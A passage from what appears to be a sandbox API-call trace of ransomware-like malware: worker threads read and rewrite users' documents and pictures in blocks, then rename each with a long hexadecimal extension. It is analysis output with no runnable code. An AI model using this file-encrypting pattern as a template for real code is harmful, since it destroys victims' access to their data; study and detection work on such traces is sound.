hHeap=0x270000) returned 1 [0167.263] RtlInterlockedCompareExchange64 () returned 0x1 [0167.264] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.268] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.269] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.271] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.272] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx", lpString2=".E0EA8B580AA9208AD9719CE3DB634E439807CD955C3FBFB5CA700440FB1BCC75" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx.E0EA8B580AA9208AD9719CE3DB634E439807CD955C3FBFB5CA700440FB1BCC75") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx.E0EA8B580AA9208AD9719CE3DB634E439807CD955C3FBFB5CA700440FB1BCC75" [0167.272] GetProcessHeap () returned 0x270000 [0167.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x112) returned 0x42f9538 [0167.272] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9538, Length=0x112, FileInformationClass=0xa) returned 0x0 [0167.275] CloseHandle (hObject=0x5ac) returned 1 [0167.277] GetProcessHeap () returned 0x270000 [0167.278] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.278] RtlInterlockedCompareExchange64 () returned 0x1 [0167.278] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.283] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.283] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.285] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.286] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx", lpString2=".990565ED7914417A4C0504946FAC92F0C52C7776E7470C28E6C0BB1F2B854B5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx.990565ED7914417A4C0504946FAC92F0C52C7776E7470C28E6C0BB1F2B854B5A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx.990565ED7914417A4C0504946FAC92F0C52C7776E7470C28E6C0BB1F2B854B5A" [0167.286] GetProcessHeap () returned 0x270000 [0167.286] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f9660 [0167.287] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9660, Length=0x118, FileInformationClass=0xa) returned 0x0 [0167.289] CloseHandle 
(hObject=0x5ac) returned 1 [0167.289] GetProcessHeap () returned 0x270000 [0167.291] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.291] RtlInterlockedCompareExchange64 () returned 0x1 [0167.291] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.295] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.296] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.298] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.300] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx", lpString2=".207150A3785CCE8CDDA2A8584946239F3B28D75D66911ACF7A8BD479FA788973" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx.207150A3785CCE8CDDA2A8584946239F3B28D75D66911ACF7A8BD479FA788973") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx.207150A3785CCE8CDDA2A8584946239F3B28D75D66911ACF7A8BD479FA788973" [0167.300] GetProcessHeap () returned 0x270000 [0167.300] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741df10 [0167.300] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, 
FileInformation=0x741df10, Length=0x124, FileInformationClass=0xa) returned 0x0 [0167.303] CloseHandle (hObject=0x5ac) returned 1 [0167.304] GetProcessHeap () returned 0x270000 [0167.306] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.306] RtlInterlockedCompareExchange64 () returned 0x1 [0167.306] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.312] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.312] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.320] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0167.322] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf", lpString2=".C9BC486F65C158551624BBF6A40D59302E0D92A78717F7FFA37D429764B56C7D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf.C9BC486F65C158551624BBF6A40D59302E0D92A78717F7FFA37D429764B56C7D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf.C9BC486F65C158551624BBF6A40D59302E0D92A78717F7FFA37D429764B56C7D" [0167.323] GetProcessHeap () returned 0x270000 [0167.323] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 
0x42f9788 [0167.323] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f9788, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0167.329] CloseHandle (hObject=0x5ac) returned 1 [0167.330] GetProcessHeap () returned 0x270000 [0167.331] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.331] RtlInterlockedCompareExchange64 () returned 0x1 [0167.331] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0167.831] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.838] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0168.387] WriteFile (in: hFile=0x5b0, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.394] RtlInterlockedCompareExchange64 () returned 0xffffffff [0168.394] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0168.397] WriteFile (in: hFile=0x5ac, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.398] RtlInterlockedCompareExchange64 () returned 0x0 [0168.398] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0169.333] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0169.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0169.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0169.350] RtlInterlockedCompareExchange64 () returned 0x0 [0169.350] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.395] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x6fef7f4) returned 0x0 [0170.396] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", lpString2=".084EC9DD8CF717B8E16F87A7E5B6552DE00984D275645779CDE822675991490B" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.084EC9DD8CF717B8E16F87A7E5B6552DE00984D275645779CDE822675991490B") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.084EC9DD8CF717B8E16F87A7E5B6552DE00984D275645779CDE822675991490B" [0170.396] GetProcessHeap () returned 0x270000 [0170.396] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14a) returned 0x4258820 [0170.397] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x6fef7e4, FileInformation=0x4258820, Length=0x14a, FileInformationClass=0xa) returned 0x0 [0170.404] CloseHandle (hObject=0x5cc) returned 1 [0170.407] GetProcessHeap () returned 0x270000 [0170.410] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.410] RtlInterlockedCompareExchange64 () returned 0x1 [0170.410] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.855] ReadFile (in: hFile=0x604, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 0x0 [0170.902] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.903] WriteFile (in: hFile=0x5b0, lpBuffer=0x78e1140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008) returned 0x0 [0170.912] RtlInterlockedCompareExchange64 () returned 
0xffffffff [0170.913] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.915] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x78e9210, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x78e9210, ReturnLength=0x6fef7f4) returned 0x0 [0170.917] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", lpString2=".5A2C3312D147DEAFA91111A6A29C93FD69B83FD6BCDB66BADF850954018B872B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.5A2C3312D147DEAFA91111A6A29C93FD69B83FD6BCDB66BADF850954018B872B") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.5A2C3312D147DEAFA91111A6A29C93FD69B83FD6BCDB66BADF850954018B872B" [0170.917] GetProcessHeap () returned 0x270000 [0170.917] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x4337f70 [0170.918] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x6fef7e4, FileInformation=0x4337f70, Length=0x152, FileInformationClass=0xa) returned 0x0 [0170.920] CloseHandle (hObject=0x5cc) returned 1 [0170.922] GetProcessHeap () returned 0x270000 [0170.923] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78e9160 | out: hHeap=0x270000) returned 1 [0170.924] RtlInterlockedCompareExchange64 () returned 0x1 [0170.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.927] NtQueryObject (in: 
Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x6fef7f4) returned 0x0 [0170.929] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", lpString2=".F3612BF053695804501DEF8FD48CF15AC759B61FE0F7FC338A7A1CFAC7E08134" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.F3612BF053695804501DEF8FD48CF15AC759B61FE0F7FC338A7A1CFAC7E08134") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.F3612BF053695804501DEF8FD48CF15AC759B61FE0F7FC338A7A1CFAC7E08134" [0170.929] GetProcessHeap () returned 0x270000 [0170.929] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x154) returned 0x43380d8 [0170.929] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x6fef7e4, FileInformation=0x43380d8, Length=0x154, FileInformationClass=0xa) returned 0x0 [0170.931] CloseHandle (hObject=0x590) returned 1 [0170.932] GetProcessHeap () returned 0x270000 [0170.934] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0170.942] RtlInterlockedCompareExchange64 () returned 0x1 [0170.942] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.947] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76e1100, ReturnLength=0x6fef7f4) returned 0x0 [0170.949] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\GreenBubbles.jpg", lpString2=".5CF1053D65E2C3246FD0906DB18C4C56DB19563759EC07FECF9840E625DB835A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.5CF1053D65E2C3246FD0906DB18C4C56DB19563759EC07FECF9840E625DB835A") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.5CF1053D65E2C3246FD0906DB18C4C56DB19563759EC07FECF9840E625DB835A" [0170.949] GetProcessHeap () returned 0x270000 [0170.949] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x160) returned 0x7733cb8 [0170.949] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x6fef7e4, FileInformation=0x7733cb8, Length=0x160, FileInformationClass=0xa) returned 0x0 [0170.951] CloseHandle (hObject=0x5dc) returned 1 [0170.952] GetProcessHeap () returned 0x270000 [0170.953] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0170.956] RtlInterlockedCompareExchange64 () returned 0x1 [0170.956] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.959] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x750a500, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x750a500, ReturnLength=0x6fef7f4) returned 0x0 [0170.961] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", lpString2=".0C31C8CCEACD412DE9B2C5C2A3CC8059409C9A0848EF2171A7A4782610D41E05" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\OrangeCircles.jpg.0C31C8CCEACD412DE9B2C5C2A3CC8059409C9A0848EF2171A7A4782610D41E05") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.0C31C8CCEACD412DE9B2C5C2A3CC8059409C9A0848EF2171A7A4782610D41E05" [0170.961] GetProcessHeap () returned 0x270000 [0170.961] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7421af0 [0170.961] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x6fef7e4, FileInformation=0x7421af0, Length=0x162, FileInformationClass=0xa) returned 0x0 [0170.963] CloseHandle (hObject=0x58c) returned 1 [0170.964] GetProcessHeap () returned 0x270000 [0170.965] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a450 | out: hHeap=0x270000) returned 1 [0170.968] RtlInterlockedCompareExchange64 () returned 0x1 [0170.968] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0171.606] ReadFile (in: hFile=0x5fc, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 1 [0171.606] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0171.607] WriteFile (in: hFile=0x58c, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0171.823] RtlInterlockedCompareExchange64 () returned 0x0 [0171.823] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0171.824] WriteFile (in: hFile=0x594, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0171.835] RtlInterlockedCompareExchange64 () returned 0x6 [0171.835] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0172.028] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x6fef7f4) returned 0x0 [0172.029] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpString2=".FC1BD111C71A8B1F0B71C386CC3EF35B50C2A1B26A248E04A090127B868F465D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.FC1BD111C71A8B1F0B71C386CC3EF35B50C2A1B26A248E04A090127B868F465D") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.FC1BD111C71A8B1F0B71C386CC3EF35B50C2A1B26A248E04A090127B868F465D" [0172.029] GetProcessHeap () returned 0x270000 [0172.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x4333688 [0172.029] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x4333688, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0172.123] CloseHandle (hObject=0x5b0) returned 1 [0172.124] GetProcessHeap () returned 0x270000 [0172.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0172.126] RtlInterlockedCompareExchange64 () returned 0x5 [0172.126] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff) Thread: id = 106 os_tid = 0xae4 [0142.350] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.306] ReadFile (in: hFile=0x5a4, lpBuffer=0x75323f0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x75122b8 | out: lpBuffer=0x75323f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75122b8) returned 1 [0156.307] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.318] WriteFile (in: hFile=0x5a4, lpBuffer=0x75323f0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75122b8 | out: lpBuffer=0x75323f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75122b8) returned 1 [0156.320] RtlInterlockedCompareExchange64 () returned 0x2 [0156.320] GetQueuedCompletionStatus (in: 